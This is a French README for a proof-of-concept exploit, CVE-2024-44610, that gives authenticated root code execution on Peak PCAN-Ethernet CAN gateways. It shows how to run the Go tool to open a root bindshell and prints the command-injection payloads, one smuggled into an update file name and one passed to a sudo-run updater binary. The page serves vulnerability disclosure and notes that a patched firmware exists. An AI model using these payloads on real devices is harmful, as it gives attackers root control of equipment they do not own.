
CVE-2024-44610 : Exploit racine distant authentifié dans les passerelles Peak PCAN-Ethernet CAN-(FD)
Ce dépôt contient un exploit Proof-of-Concept (PoC) qui exécute du code en tant que root sur les passerelles Ethernet Peak. Il nécessite que vous connaissiez les identifiants de l'interface web.
Le fournisseur a rapidement fourni un firmware corrigé :
Compilez le programme avec Golang puis exécutez-le comme suit :
./PcanExploit -ip 192.168.1.10 -httpaddr 192.168.1.250 -user admin -pass admin [-fd]
Si l'exploit réussit, un bindshell sera démarré sur l'appareil en tant que root. Vous pouvez voir deux captures d'écran en bas de cette page.
Les options ont la signification suivante :
Bien que la version non-FD soit également vulnérable, cela a peu d'importance pratique car ces appareils n'implémentent pas de mises à jour de firmware signées, et vous pourriez donc simplement télécharger votre propre firmware modifié.
Deux vulnérabilités d'injection de commandes shell sont utilisées :
Il est possible d'inclure une commande shell dans le nom du fichier du paquet de mise à jour téléchargé sur l'interface web, par exemple :
test';ping 1.1.1.1;'.raucb
La commande sera exécutée en tant qu'utilisateur www-data, qui exécute le serveur web. Le nom de fichier doit avoir la bonne extension (tar ou raucb selon l'appareil).
Le binaire exécute en interne system sur le nom de fichier fourni, tant qu'il existe. Il peut être exploité comme suit :
sudo /home/peak/updater -f "a;ping 1.1.1.1;"
Comme ce binaire peut être exécuté via sudo, il est possible d'exécuter la commande en tant que root.
Appareil FD :

Appareil non-FD :
